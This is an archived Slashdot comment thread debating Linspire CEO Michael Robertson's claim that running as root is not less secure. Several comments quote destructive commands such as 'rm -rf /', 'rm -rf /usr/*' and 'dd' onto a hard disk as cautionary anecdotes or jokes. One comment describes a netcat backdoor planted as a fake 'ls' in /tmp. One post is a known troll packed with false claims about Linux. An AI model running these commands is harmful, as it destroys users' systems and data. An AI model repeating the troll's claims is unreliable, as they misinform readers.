Slashdot Mirror
Michael Robertson Says Root is Safe
Kez writes "HEXUS.net caught up with Michael Robertson, CEO of Linspire, at the UK launch of Linspire 5. Their interview with Mr. Robertson covers everything from hardware support to software patents, but a comment from Mr. Robertson on using root is perhaps the most interesting: "I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer. They say 'oh, yeah, it is!', but it really isn't." I would imagine a few Slashdotters would dispute that."
- Any exploitable program you run as another user will still need a local escilation exploit in order to do anything harmful. Running something like apache as root, and any vulnerability in programs such as phpMyAdmin will make your whole server go poof.
- rm -Rf / as nonroot will make you give a sigh of relief. As root will be your nightmare.
- ActiveX and a lot of spyware is contained in windows when running as non-administrator. It's running as admin (like most people do), that cause the majority of problems with things.
This kind of talk is pandering to the lowest common denominator of user. Honestly, I feel users SHOULD learn a little bit about privileges before being handed the machine, and clicking on that file attachment.I know Slashdot attempts to soundbite things just like any other modern news media, so I'll quote:
Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well.
MySQL, for instance, runs as a separate user. If I so desired, I could limit the login / password for my MySQL account to only allow row INSERTs and SELECTs, but no DELETEs or DROPs. If someone were to break into my account, they could see my data, but at least they couldn't delete from the table. As root, they could stop and start the actual service, and wipe out the whole directory for that matter.
I generally see what he's saying about data being king. But if your data is that important, you'll have other safeguards for protecting it, typically via (dun dun dun), user management! For instance, keep your accounting files under a different user, home directory chmodded to 700. Stuff like that.
Then you could say "Well, it's not really about your data, it's that people could accidentally mess things up!". Well, you could accidentally drive into a wall as well, it doesn't mean we should make all cars drive at 10 miles an hour. So, I don't see the added benefit.
Cars happen to have seat belts. Roads also have speed limits, so this analogy is flawed.
The best way for Linux to break into the market isn't to emulate windows entirely. The best way is to take the best of what windows has to offer, and augment it with the best of what Linux has to offer. After all, look at Firefox. Firefox didn't choose to adopt ActiveX, or adopt Microsoft's proprietary style transitions, or render CSS in the same broken way, right? Neither should Linux, or in this case, Linspire.
/^[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}$/i
Michael: I think, like everything, it's a question of balance. Ease of use, versus security. I defy anybody to tell me why is it more secure to not run as root. Nobody really has a good answer. They say "oh, yeah, it is!", but it really isn't. Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well.
Techincally it's gaining control over your system without you knowing it and running exploitable programs as root makes that easier. If the hackers get access to your libraries, programs, etc, they can do far more damage to you by sniffing your data w/o your knowledge. Hackers aren't going to just steal your data and run. If they can gain easy access to the system they are going to modify it and snoop everything and keep getting what they came for.
Michael: Then you could say "Well, it's not really about your data, it's that people could accidentally mess things up!". Well, you could accidentally drive into a wall as well, it doesn't mean we should make all cars drive at 10 miles an hour. So, I don't see the added benefit. I DO see it's an added pain in the ass when grandma tries to change her wallpaper, and it tells her "you don't have root privileges". What are you talking about, man? I'm just trying to use my computer, or change the clock, or any one of a hundred other things. So, people always say "it's less secure", but I defy anyone to point out a single instance, and people all go "Well, I, erm, it's theoretical!". There's no one area I think you can point out - In this instance, a machine that's run with the root user could be compromised, in this instance one couldn't be compromised.
I am in no way a master of Linux/UNIX and I never claimed to be but even I know that if you are exploited while running something as root more damage can be done to a lot more services, files, etc, than if you were just running it as a user. It's not theoretical. It's fucking very real and it's idiots like this guy that make it easier and easier for more zombie boxes to get out there. Look at Windows... Yeah, no, we don't need Linux to end up like that too.
I want to know who the hell this guy is talking to that don't give him a valid argument. I have a feeling they are and he isn't listening.
Michael: I know the hardcore geeks feel differently, that's fine. When somebody installs Linspire, we say "do you want to set up users, yes or no", we give them the choice, right there when they start up for the first time. If they want to set up multiple users, they're welcome to do that, but we don't force them to. That's the difference we have.
It shouldn't even be a choice. Prompt for a password (like OS X) when something that needs root privledges runs. If it has succeeded with the Mac then it can with Linspire users too. If you are so concerned about making the users have a positive Linux experience rewrite the dialog boxes when they ask for "root priveledges" so that they are human readable. Don't just eliminate it and say that there's no valid reason not to. Taking the easy way out doesn't solve the problem.
Since when is Michael Roberson a trusted source? He's an asshole that's just into pushing the envelope and making waves (remember Lindows and MP3.com?) Right now he's doing exactly the same thing. "See, those Linux users are trying to make it hard for the layperson to use "their" OS and I'm trying to make it easy. Listen to me! I'm trustworthy!"
Not running as root works like this. Your data is no more inherently safe than it is when you /are/ running as root, but nobody ELSE'S data will fall prey to your screwup, nor will the central integrity of the system. (For granny, this means that grandson Billy can ssh in, recover this morning's backups from the write-once partition, and she can keep going, having lost minimal data.)
Running as root is like pointing a loaded gun at everyone just in case they're a criminal.
Not running as root is like fastening your seat belt. Sure, you're not intending to get in an accident...
Running as root is like driving down the highway with your hood open and your oil cap off.
Not running as root is like locking your door when you leave.
Running as root is like posting to slashdot without reading TFA. :)
This flies in the face of science.
Coming from the Windows side, I hear this warning constantly, but rarely hear about the practical fallout. OK, splain, Lucy.
Don't disappoint your bird dog. Go to the range.
So that IE users don't end up downloading + installing every ActiveX spyware app in existence and messing up the entire computer?
You've got to be kidding me. Is this just a big troll or is this guy actually that ignorant? Who the hell has he been talking to anyway? The reasons for doing day-to-day things as a non super user is one of the most basic security concepts ever. Even my parents understand this. The reason you don't run everything as root is to avoid COMPROMISING THE ENTIRE MACHINE if some random application has a vulnerability. You don't want each and every little program you run to potentially allow someone to gain full access to everything on your computer. Not to mention protecting the computer from the application itself. I don't want some poorly written piece of software accidentally deleting important system files or some other user's data. And how about protecting the system from the user themselves? How many people here have accidentally rm'd a bunch of important system files (or all of / for that matter) on accident? I know I have and I consider myself a very careful person when it comes to such things.
C'mon... How fucking retarded can you be?
He does _almost_ make a good argument for his case though...
Here's why: What's the most important thing on your desktop? It's the data. If someone gets access to your libraries or whatever, who cares? Your data is the most precious thing on your computer. And whether you log in as root or log in as user, you have access to that data, technically anyone who's compromising your account has access to your data as well.
That statement does have some merit but it definitely isn't always true and even then, I would much rather compromise only my data than have someone gain access to the entire system. If they only get my data, that's all they get. If they gain access to the entire system there is no limit to what they can do... What if they want to setup a very well hidden rootkit and snoop around on my box (watching traffic, capture credit cards, etc. etc.) for as long as possible? Not to mention multi-user systems... A compromised super user gives them full access to EVERYONE's stuff.
And of course, after he says something nearly sensible he goes on to completely shoot himself in the foot by making another completely ridiculous challenge...
So, people always say "it's less secure", but I defy anyone to point out a single instance, and people all go "Well, I, erm, it's theoretical!". There's no one area I think you can point out - In this instance, a machine that's run with the root user could be compromised, in this instance one couldn't be compromised.
What world does this guy live in? Is he completely surrounded by idiots? Remind me never to go anywhere near Linspire.
I work as a consultant for several fortune 500 companies, and I think
I can shed a little light on the climate of the open source community
at the moment. I believe that part of the reason that open source
based startups are failing left and right is not an issue of marketing
as it's commonly believed but more of an issue of the underlying
technology.
I know that that's a strong statement to make, but I have evidence to
back it up! At one of the major corps(5000+ employees) that I consult
for, we wanted to integrate the shareware version of Linux into our
server pool. The allure of not having to pay any restrictive licensing
fees was too great to ignore. I reccomended the installation of
several boxes running the new 2.4.9 kernel, and my hopes were high
that it would perform up to snuff with the Windows 2k boxes which
were(and still are!) doing an AMAZING job at their respective tasks of
serving HTTP requests, DNS, and fileserving.
I consider myself to be very technically inclined having programmed in
VB for the last 8 years doing kernel level programming. I don't
believe in C programming because contrary to popular belief, VB can go
just as low level as C and the newest VB compiler generates code
that's every bit as fast. I took it upon myself to configure the
system from scratch and even used an optimised version of gcc 3.1 to
increase the execution speed of the binaries. I integrated the 3
machines I had configured into the server pool, and I'd have to say
the results were less than impressive... We all know that linux isn't
even close to being ready for the desktop, but I had heard that it was
supposed to perform decently as a "server" based operating system. The
3 machines all went into swap immediately, and it was obvious that
they weren't going to be able to handle the load in this "enterprise"
environment. After running for less than 24 hours, 2 of them had
experienced kernel panics caused by Bind and Apache crashing! Granted,
Apache is a volunteer based project written by weekend hackers in
their spare time while Microsft's IIS has an actual professional full
fledged development team devoted to it. Not to mention the fact that
the Linux kernel itself lacks any support for any type of journaled
filesystem, memory protection, SMP support, etc, but I thought that
since Linux is based on such "old" technology that it would run with
some level of stability. After several days of this type of behaviour,
we decided to reinstall windows 2k on the boxes to make sure it wasn't
a hardware problem that was causing things to go wrong. The machines
instantly shaped up and were seamlessly reintegrated into the server
pool with just one Win2K machine doing more work than all 3 of the
Linux boxes.
Needless to say, I won't be reccomending Linux/FSF to anymore of my
clients. I'm dissappointed that they won't be able to leverege the
free cost of Linux to their advantage, but in this case I suppose the
old adage stands true that, "you get what you pay for." I would have
also liked to have access to the source code of the applications that
we're running on our mission critical systems; however, from the looks
of it, the Microsoft "shared source" program seems to offer all of the
same freedoms as the GPL.
As things stand now, I can understand using Linux in academia to
compile simple "Hello World" style programs and learn C programming,
but I'm afraid that for anything more than a hobby OS, Windows
98/NT/2K are your only choices.
Some users will type in anything you tell them.
Singe page article.
I would agree. The OS is not the problem, it's the user. The same thing applies to Windows. Using Windows with the Administrator account is perfectly safe if you're not an idiot. I don't see why it's unsafe to do so on a *nix system.
But I want to know his IP address.
Lets do "rm -rf /" and compare the results.
"I disapprove of what you say, but I will defend to the death your right to say it." - Voltaire
While we all want to start lambasting him for his obvious lack of understanding of the obvious, I think it is actually endemic of the real problem.
People do not understand anything about computer security.
They do not understand how to limit exposure.
They do not understand the vectors of software virus infection.
They do not understand the true problems of viral infection (that is: they want to eliminate the side effects, but do not care about the primary problem).
Mocking people for being clueless does not actually make them smarter, nor does it impress them with your 31337 Haxor Skillz.
How does the Slashdot Effect happen given that no slashdotters ever RTFA?
It is about as secure as windows.
root is unsafe because it is very easy to shoot one's self in the foot when root. Consider the trivial example of typing rm *, or rm -rf * in the wrong dir.
Mirror here
"I'd rather be a lightning rod than a seismometer." -Ken Kesey
sure running as root is safe, what's your ip again?
not allowing the installation of software without root password? How about protecting certain mission-critical parts of the system? Might those be good reasons not to use root as a main account?
Running as root can lead to the immediate destruction of your filesystem and potentially hardware by a malicious program, while running as a restricted user can only get your documents deleted or your system ground to a halt. The people who code Linspire are either too lazy or incompetent to implement a Mac OS X-like security system, where the user inputs their password for operations that require root.
I'd like him to run on an account where he's not root, thanks.
I think this is possible the dumbest thing i have seen. I always thought the implications where obvious.
Hmm... Root can write to ANY file? Open ANY Port?
Why even have security on a system no one has ever given a good reason that it works.. I mean look at all the comprimised systems out there. Security Clearly doesnt work.
this should be good enough reason right here not to run as root.
./
/
/boot & /etc were the first things rm'ed
rm -rf
and btw, i didn't press the . hard enough cause i was typing really fast so it ended up looking like this:
rm -rf
oh and btw,
This reminds of a shirt I once say:
"Daddy, what does 'Formatting C:' mean?"
Yes that was in DOS, but you get the point.
Well, there's spam egg sausage and spam, that's not got much spam in it.
Well, doesn't his company sell support contracts to joe users? Keeping this in mind, wouldn't this qualify as taking care of job security?
No, wouldn't want to be the tech support person either.
In the article, Michael defines security as the (in)ability to access personal data. In that respect, he's probably right. But I think he oversimplifies the real question of allowing the users to run under the one account that could really screw up their machine.
He argues that just because we could possibly drive our cars into brick walls doesn't mean we should all be limited to driving at 10 mph. I don't believe the likelihood of even the least skilled driver actually ramming into a brick wall is quite as much as my grandma's likelihood of completely screwing up her computer were she granted root access. I've seen her mess up her Windows machine pretty nicely.
http://nerdfortress.com/
Oh no! Not /boot and /etc! How will I ever replace those?!
Thinking of modding me down? You need to RTFA too.
-- 'The' Lord and Master Bitman On High, Master Of All
chmod 777 -R
amongst a high seas of other things that make running as root unsane on the "woops scale"
as to be in dangeour from a remote source , well if you make a conection an open conection to someone you dont know when you root then
The only things certain in war are Propaganda and Death. You can never be sure which is which though
Who didn't see this coming?
What, so the name "Lindows" didn't clue you in from the start?
Random anti-Linux gibberish; nothing to do with this (or any, really) topic.
But then again, unlike everyone else, I'm not an idiot!!!!!!1
/usr/ instead of /usr/samba/ (mind fart), or accidently hitting enter before you can complete "kill 14914", and ending up with "kill 1"... nasty results, stupidly unnecessary.
On a serious note, he really shouldn't have said that. I know he's just defending a practice that's encouraged natively by his product, but saying something like that kills a lot of credibility instantly.
Running as root is bad because it unnecessarily allows room for user (or program) error which can often have devistating results.
It also allows normal security glitches in programs the same access to cause such undesirable effects. The stupid buffer overflow in Mozilla just went from erasing your home directory (full of scanned comic books and editor preferences) to erasing 5 years of corporate data. Woops!
Not to mention that at one point or another, everyone screws up a command. Be it typing rm -Rf
These things can't be prevented entirely, but running as a non-priviledged user goes a long way, not to mention it helps encourage proper access and operational policies in the system.
This is exactly the kind of attitude that I'd expect from someone that learned everything they know about computers from working with MS-DOS... he can't seem to conceive of the notion that there might be more than one person's data on a single machine!
"Freedom means freedom for everybody" -- Dick Cheney
Let's just wait until he has 100 million customers (98% of which will be totally clueless if the Windows user base is any indication) and we'll see if it's such a good idea.
Why is it more secure not to run as root?
500,000 Windows zombies should be the only answer you need.
include $sig;
1;
Really someone ought to put him in a room with Theo to see if they cancel eachother out.
So every user on a system usually can make files in /tmp. Let's say that a malicious user of the system goes into /tmp and makes an executable file named ls. That executable file contains the code which opens up a backdoor onto the system via netcat. If you were running as a normal user and ran ls in /tmp then you would not open up any backdoor. In fact, you might realize what's going on and be able to fix it. If you were root however, the backdoor would open wide and let the whole world have a root shell on your machine. This particular problem can be averted by removing . from $PATH of all users including root. But does Linspire do this? I don't know for sure, but I doubt it.
Linspire, Linux dumbed down for dummies by dummies.
The GeekNights podcast is going strong. Listen!
... however, your comment about FireFox not adopting ActiveX, I would put to you, is actually not a good thing. Many, many Microsoft software developers are exploiting this, and without ActiveX compatibility they aren't going to migrate to FireFox very quickly (if at all).
On a side note: this is sort of like Word and Excel macros and OpenOffice.org. Without them, Oo.org is missing quite a few companies.
XML is like violence. If it doesn't solve the problem, use more.
default dcc save directory is ~ . many users of irc are accustomed to permitting auto accept of files. someone sends you a .profile or .bashrc . .profile is sourced on every login. hmm i wonder what happened to all my filesystems.
...lots of people have a blank password. I've seen it countless times in a windows environment.
Let's say user A has a blank password, and runs as root. Said user also turns on SSH. Say hello to remote access for anyone who knows your IP, and goodbye to your computer (unless he simply installs a trojan as root... what fun!).
Interestingly, OS X allows you to enable and disable the ability to login as root as needed. Logging in as root by default is disabled (though commands can obviously be run as root with su).
I wish I were old enough to put "Computer" on my resume.
1) It protects you from yourself. Nobody's perfect all the time.
2) It limits damage from exploits. Go ahead and be root if you aren't networked and never insert media, or are running a perfectly-secure OS.
3) it protects you from another user's malice. N/A for single-user machines.
Examples of when it is OK to run as root:
1) many non-networked embedded systems, e.g. your microwave oven
2) the DOS box in the corner your kids play DOOM I on.
3) Demo machines at trade shows, but only if they are not networked and have no removable media.
Other examples where running as root isn't advisable but the damage is greatly mitigated include read-only systems like Knoppix.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
Linux's (well Unix's) strenght is the ability to do everything. Thats why you need to be a user who isn't allowed to do some stuff :)
This would be worse than running Windows as an admin, because in Windows they have made stuff impossible to stop it being done for the wrong reasons, rather than putting a password on it. Maybe MS was right... No wait I meant Linspire is wrong.
# cat
Damn, my RAM is full of llamas.
Sure, you might have enough confidence in your setup to operate under root, but why would you intentionally do it when you could run things with fewer permissions? This is like saying "hey my router is l33t so i'm just gonna keep the DMZ on 24/7".
Never remove support beams from the building if you don't have to, eh?
All your base are belong to Google.
You suck. You've got nothing better to do than copy and paste stupid trolls to slashdot? This suggests one of two possibilities:
Before you counter with some sort of "well what about you, writing this stupid reply" type argument I should point out that I am only wasting my amazing intellect on a fuckhat like yourself because I'm currently waiting for several servers to come back up. It's either this or head off to the bathroom with my powerbook to masturbate to internet porn.
I have to say I love the OSX solution. For those of you that aren't familiar:
The method:
By default you don't use root (although it does exist)
By default a user may or may not be an "admin" user. An admin user may perform root-like operations by authenticating again, but they give their own same password to the OS to do things.
It still knows you're you, you're just super-you. So default files are created with you as owner, for instance. This is safer because it reduces slightly the number of escalations necessary.
The effects:
The actual user password being compromised is not the reason you need a separate root account, so they removed your need for two passwords.
Bad apps still need separate priv escalation to do any harm, even if you're running as admin.
BUT you don't have to logout of your GUI session to have one app - or even ONE PART of one app - run with escalated privledges, if you authorize it to.
This means you have NO REASON to ever run unnecessary apps as an admin. No downloading just that one file as root because you're in the middle of doing a rooty thing and forgot one.
The similar linux hack:
I know you can setup similar things with sudo and a little tweaking. But this is how every OSX box ships, and it ought to be how every GUI consumer linux box ships too.
Looking for freelance Actionscript (Flash/Flex) or ColdFusion work and/or freelance developers. Email me, put Slashdot
And how often have you actually done that by accident?
We all know the reasons not to run anything as root unneccesarily are many, but you have to think from his perspective as well. He's picturing clueless linux desktop users, using a shrinkwrapped distro at home for personal use. If they were to only log in as a user rather than root, what does it buy them? Whoever gets them to run malicious code by exploiting them or their software will still get access to all of their data, since it was all stored as that user. And they still get access to backdoor all of the software they use, since they can screw the user's environment (PATH, LD_LIBRARY_PATH, etc).
About the only thing not running as root saves the poor nontechnical home end-user from is wiping out their hard drive, but all the data that's important to them contained therein is still destructable.
His point is in fact arguable - why bother?
11*43+456^2
Consider this:
a) an awful lot of home machines are either single user, or effectively single user (where everyone shares a single account)
b) all the system files are backed up on the nice, shiny install media
c) none of the user files are backed up
If you're not talking about a server or other shared/critical environment, then the only things of any real value on the machine are the user's own files. Root or not, they can toast them. Lindows, in case you hadn't noticed, is *not* aimed at servers...
It's official. Most of you are morons.
means, that you dont have any standard user on the machine where you just have to guess the password. On the other hand sharing the same password for sudo and the normal user, like OSX and Ubuntu do it, is as much as a security risk as having a dedicated root because all you have to find out is how to get into the machine as a normal sudo user.
I knew Michael Robertson in college and he was a technological lamer and pretty much an A-hole. And he doesn't appear to have changed much. He's cobbling together whatever technologies he can get his hands on and then shamelessly pimping^H^H^H^H^H^H^H self promoting whatever his latest project is regardless of merit.
He unfortunately seems to have learned that there is little fact checking in the business press - especially where technology is concerned - and that if he can create a stir he can probably create profit.
It was several years before I realized that it was the same Michael but I visted the website and found his picture there - in multiple super high resolutions - seriously why would I want a 1435x1980 pixel image of him?
Does he think he's desktop material? There's even information for booking him for speaking engagements... but it's not about ego. *SIGH*
Look for the stock pump and dump scheme followed by an SEC investigation in 5 - 10 years...
=tkk
Bill Gates - Creationist?!?
I challenge a non-root user to screw up a system as bad as this.
dd if=bootimage.bin of=/dev/hda
"Weird," I thought. "Why did it come back so fast? Usually floppy writes take a whole lot longer?"
I had been doing
dd if=bootimage.bin of=/dev/fd0
and brainlocked.
Just read his responses....[a few of my repiles]
Running as root is dangerous, but is more dangerous than the average home user is used to? Probably not. The average user probably runs windows from a single user account with admin rights. For most people, the recycle bin is the only protection from stupid mistakes.
Malicious software can always trick user into giving it administrator access. But if you always login and root, one bad mouse gesture in file explorer can make your system unusable. Just yesterday I saw someone with a master degree trying to store MP3 files in /Library on MacOSX.
Besides, if you have a family PC why would you want everyone messing up each other's files if they can have nice separate home directories?
Just how often is there more than one person's data on a machine? At home my computer is mine, at work everyone have their own machine. Well, my coworker checks my email while I'm away from the office for a few days to make sure no disasters are missed and I do the same for him but that doesn't count. It's not 1980 anymore - most computers are single user machines.
... him having a chat with Theo de Raadt about this...
Aside from blaring user error (i.e. any command using -R) it is my opinion that the computer is already compromised if you are using have the system console. Gaining root or hardware access is fairly simple and things such as encrypted filesystems are obviously out of the Linspire's scope. While I believe it would have been "better" had they used a sudo-like implementation (e.g. ksudo / MacOSX) I can understand why a business would take the root approach.
I thought I'd pick on myself before somebody else did.
I know in linux you can, for instance, open a terminal, su, and execute a GUI app as root while in an X session not as root. However, there's no general linux way for doing this for a nonCLI user.
I also know that in Windows you can "run as" by providing that alternate password, and you could set your Administrator and user passwords the same. But you get all sorts of problems doing this - for instance with an app that needs admin privs to install but not to run.
Finally, I certainly know that not every single security thing Apple has done has been right. This thread is particularly about their admin-user design, which I think is an ideal DESIGN. If they left open a hole somewhere, they should fix it. But the design is brilliant.
Looking for freelance Actionscript (Flash/Flex) or ColdFusion work and/or freelance developers. Email me, put Slashdot
"we wanted to integrate the shareware version of Linux" Are you for real? Seriously? You're a consultant? You're being overpayed, or you're just blagging it.
'For we walk by faith, not by sight.' II Corinthians 5:7
Changing the wallpaper or the time? I don't believe you need root access for either. Even if you did, how difficult is it to change that? The car analogy is pretty weak. Does the average computer user - and the extensive computer user - take 10+ hours of computer-teaching lessons along with theory studies and months of needing your dad to sit by you as you type? Getting a driver's license requires you to know your car, more or less inside out. If every computer user would do that, MAYBE it'll be a valid analogy. Even so, not being root still saves you. People still drive into brick walls; Accidents still happen. And, using Robertson's analogy, people still type rm -rf / instead of whatever. You might say that all that is needed is a couple hours' work to reinstall everything, but isn't that the purpose of Linspire? To save time, for those to which that time is worth a lot of money?
Find free books.
With poorly designed hardware, it is possible to wear out the hardware. Cheap printers and disk drives are relatively easy to wear out in a worst-case scenario. Certain types of flash memory can be destroyed by flashing it a few thousand times. While your operating system may not require you to be root to overuse these components, in principle it COULD force you to be root to do this.
If you can write to BIOS or other boot-control data, you can potentially leave the hardware unbootable. Technically it's not hurting the hardware but you've still got a boat-anchor until it gets serviced.
Older monitors could be fried if set to a "bad state" and left there too long. Ironically, in X-Windows, you don't have to be root to change the video settings to such a "bad state."
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
Uh well, I think he is actually that ignorant (or lost is more like it). This is the guy who started mp3.com and thought that the music industry was going to give him a big pat on the back for it and let them into their billionaires club. Even worse is how he down-talks illegal copying like it's a back-alley dirty activity, when in truth nobody is doing any worse than he has been, is, and will likely continue to do for the rest of his life. IMHO, he is the epitomy of blind love for evil systems. No matter how poor it is, evil it is, he throws himself at it with pure optimisim and glossy eyes.
Then you could say "Well, it's not really about your data, it's that people could accidentally mess things up!". Well, you could accidentally drive into a wall as well, it doesn't mean we should make all cars drive at 10 miles an hour. So, I don't see the added benefit.
The analogy is more than flawed. Adding a regulator to keep cars below 10 MPH would limit the utility of a car. What he's arguing for is more like replicating the controls and placing them at various points around the car. Sure, you can argue that's not inherently dangerous, but one does not have to think to hard to see scenerios where it could increase the odds of bad outcomes.
Michael "Root" Robertson is appointed to the Department of Homeland Security's Privacy Board.
This is exactly what I am talking about. For a desktop system, a single-user environment, USER ACCOUNTS ARE STUPID.
Not the dummy accounts with no access which various services run as (eg: mysql only has access to its DBs and nothing else), those are important.
But the USER of the computer. In an environment where heshe is the only user (true in 99.999% of cases- wastefulness debates being an unrelated issue), there is no reason at all to not run as root. For exactly the reasons mentioned in the article: Nobody gives a flying crap about anything they dont have write access to.
Why?
Because the things they dont already have write access to, they did not write. If they did not write them, they were written by someone else, and can be EASILY REPLACED. This is debian based. Something fucked up? Oh nos! apt-get install and happy new year.
We are not talking about a vast multi-user network on a secure system. We are talking about a desktop. A single person who wants to read e-mail. When shit happens, it can do just as much damage with a user account as it can without one.
"But... Hardware!"
If your hardware can be broken by saying not-nice things to it, that is a bug in the hardware. That is not something to be corrected by disallowing things from talking wrong. Why in the almighty fuck would you put up with hardware which dies if it is sent the "die now" command? This isnt the CIA, here.
magical metaphor land:
A man is known to kill people whenever someone says "hello!" instead of "knickerbockey boingydoo". Do you: lock him away and stare at him through a tiny hole forever, or: tell everyone in the universe that greetings will now be handled by a password-locked greeting machine whereby pushing the big green button will always produce the greeting "knickerbockeyboingydoo!" and attempting to give a greeting all by yourself will result in an error.
back to reality:
I dont use root because I prefer to see the word "shruggar" everywhere.
-- 'The' Lord and Master Bitman On High, Master Of All
RUN!
This guy is absolutely clueless about the basic security principles and even makes a fool of himself in public by showing how much wiser he is than the generations of researchers and engineers which established them :(
I would expect a Linux company CEO to know better than this or at least have few smarter engineers to hit him with a cluestick when necessary.
Even Microsoft learned that running as root is wrong and causes tons of problems. Now a Linux distributor comes preaching the opposite? Unbelievable ...
If I have root access, I can change the data and you wouldn't even know that it had been changed unless you compared it with a known good backup.
Root puts EVERYTHING at risk.
Also, his car analogy is flawed because people DO accidentally drive into walls and trees and other cars. And many times, people DIE from that.
But we accept the risk because of the massive benefits of being that mobile.
What are the benefits of running as root instead of a regular account? I run Ubuntu and I never have a problem with my regular user account.
I was running as root setting up our debian server at work to do some level 1 raid magic. I was real close to finished after working on it the better part of a day or two ... after jumping around editing this file, doing that, mirroring a partition of a hard drive, I wanted to undo something a copy I made by nuking a directory ...instead I typed someting dumb like:
rm -rf /usr/*
after hitting enter and realizing how dumb I really could be, I truly understood why you shouldn't be running around as Mr. Root.
Though I needed root privs to edit some of the conf files and what not, you realize that sometimes running as root is like having sex without a condom.
If you want to have kids, don't use a condom.
All of the rest of the times, though ... it's a real good idea, because the rhythm method just does't hack it ...
... he should rename his Linspire to something like Lindows.
Don't fight for your country, if your country does not fight for you.
rm -rf ~
Hey look, the system is screwed up the exact same amount, as far as absolutely anyone at all cares.
-- 'The' Lord and Master Bitman On High, Master Of All
OK, I'll bite.
Keeping in mind Linspire is totally Desktop-centric, I can see why they might have a radically different view on the permissions system from most existing Linux users.
I've already read lots of lengthy posts trashing this contrarian point of view. And they have a lot of good points, as yours does, but ultimately this reads like a single-user vs. multi-user culture clash.
The fact is that on any operating system when you have a single, important user who runs malicious code, it doesn't matter much whether they're root or not, unless the machine has a security model more fine-grained and well-integrated than anything currently in wide use.
If that user can access their own files, then their own files can be destroyed. If that user can access the internet, then the compromise can also send their files over it. Or it can simply make them a spam bot. Or a relay. If that user has an address book, then its contents can be targets for viral propagation. And so on, and so forth.
Frankly, to do most things attackers want to do, "root" is unnecessary. Nothing within the unix "user management" repertoire really lets you deal effectively with this problem, and what few solutions you do have are, let's be honest, ugly, cumbersome, evil hacks.
What stops all this? A real, heretofore unknown high-level security model, that actually says "The email program can access stored email data, preferences, and can talk to the network on this port, to these hosts" and "the word processor cannot talk IRC" and so forth. This requires a rich resource model, rethinking data storage metaphors, the whole nine yards. Unix does not have this. Windows hosts only have it in the crudest and most limited form with "personal firewalls" that to some extent at least police the network activities of applications.
So for all the Unix folks, of course, this disdain for the security model is heresy, but for the desktop world (and really, servers benefit greatly from a fresh perspective as well), it's not such a bad point. Unix lacks a security model rich enough to be truly useful to everyday users, and by extension, companies like Linspire that cater to them.
Tired of Political Trolls? Opt Out!
For a single user system, there's no good reason not to run as root. I regularly log in as root on all the systems I own.
Michael Robertson has such a long history of controversy for the sake of controversy that anything from this guy whatsover goes like this: |
A bigger deal is Apple withdrawing setuid/gid in one of their OS "updates." Ouch.
http://tinyurl.com/4ny52
linsprire during installs now strongly encourages you to set up a root and user account.
So he's just posturing, but back in the day you had to assume anyone who got on your system could get root if they wanted it.
He's right that your data is very important, most important than the OS files..
We allowed one of our partner to log on to our system to do some setup/testings as 'toor' with a different password but with root privileges. Oh yeah, like the unimaginable, he did a 'rm -rf *' on the wrong window with / as current dir. At least he can't logon to our production server to do the same thing.
All I have to say is that running a Gentoo install while completely drunk is extremely entertaining, even if extremely hazardous for your health.
Drunken root is not like being a drunken master of kung fu.
it only takes one time ... and yes, I've actually done something close enough to that to realize that one time is enough.
He's dead right, Linux users running everything as root is the only strategy that would offer any safety for Microsoft.
"The question of whether machines can think is no more interesting than [] whether submarines can swim" - Dijkstra
I never liked Linspire, but this statement has just become my #1 reason to recommend users against ever trying it.
There are lots of fine Linux distributions around that care about security, so why choose one that doesn't care?
I view security somewhat as an analogy to homes. If I live in my home, and I am the only person who lives in my home, I can have all of the doors keyed the same, and use the master key, and have the master key on me at all times. If my house is broken into, it is all my stuff. This is the same as running as root all the time. Now, I may have things that I'd prefer not to get stolen, then I'd have a safe. Now, I wouldn't have a house safe that is key operated that uses the same key as my front door. I just wouldn't. I might store a spare house key in my safe so that I know how many house keys are out there, etc, but I would not have my safe using the same key as my front door. This would be similar to having my own computer system, but not running as root. Instead I would use a non-privileged user account for most of my day to day operations and only use "root" or "administrator" in the case where I specifically need those privileges. Now, in a multi-person environment, things change. Let's use an apartment (or hotel, if you please) as the word picture this time. If I managed an apartment, I might have a master key for the entire building. My life would be a heck of a lot easier if all I ever carried was the master key. I could go into whatever apartment I wanted as I pleased. I would only ever have to worry about losing that one key. This is the same as running as root on a multi-user system. I have access to everything. Back to the apartment model. If the apartment manager is getting groceries one day, and someone steals his ONE key, the whole apartment is now wide open to the person who possesses the key. A smart apartment owner might instead have a safe where he stores that key. The only key he would carry would be the key to open his apartment, and that key would not open his safe. If his key were now stolen, there would be a lot less risk to the other people in the building. Similar in a multi-user computer situation. As a user (or a tenant), I'd rather have an admin (or manager) who is security conscious enough to take basic precautions. As an admin (or manager), I'd rather take some simple precautions as come cya. For a one person system, root or not root.... not a large difference.... that being said, not following "good practices" is a bad practice.
-- www.WhereHaveIBeen.com
There's an old bit of Unix Folklore about recovering from an "rm -rf /" by Mario Wolczko that originally made the rounds on Usenet in 1986.
It's one heck of a read.
The most valuable thing on my computer is probably the user name and password to my internet banking facility.. Not that I store them on the machine but I do type them in. Maybe running as non-root does give you access to all the data in a users home dir but it sure makes it more difficult to overwrite those libraries he's talking about with keylogging trojans that will harvest my passwords.
It IS THE SYSTEM, NOT THE USER!
:-)
Sorry for the caps but its true..
The user can accidently run things that (s/)he may be ignorant of, and unfortunatly have unforseen side effects.
For example surfing to a webpage that contains an virii/spyware/crap/etc that executes upon load because of bugs in specific browsers...
Clicking an indiscriminant link by accident IS the users fault, but it shouldn't be up to the system to do everything the user says like a brainless zombie mornic mornon (yes thats moron x2 - because not thinking before doing anything is a moronic thing to do, System and user alike!)
So as you can see, IF YOU FALL ASLEEP AT THE MOUSE, and you click something deadly because you're system is a moron - reply to this with your happy thoughts about your infected/lost data.
Thanks! I love a good laugh
This man obviously hasn't met my sister: She attempts to open music files by selecting them in groups of 100, resulting in 100 sessions of xmms...I can only imagine her with root access.
When your entire home directory is deleted - all your work, all your bookmarks, all your records, all your porn - does it really MATTER that the rest of your system is still intact?
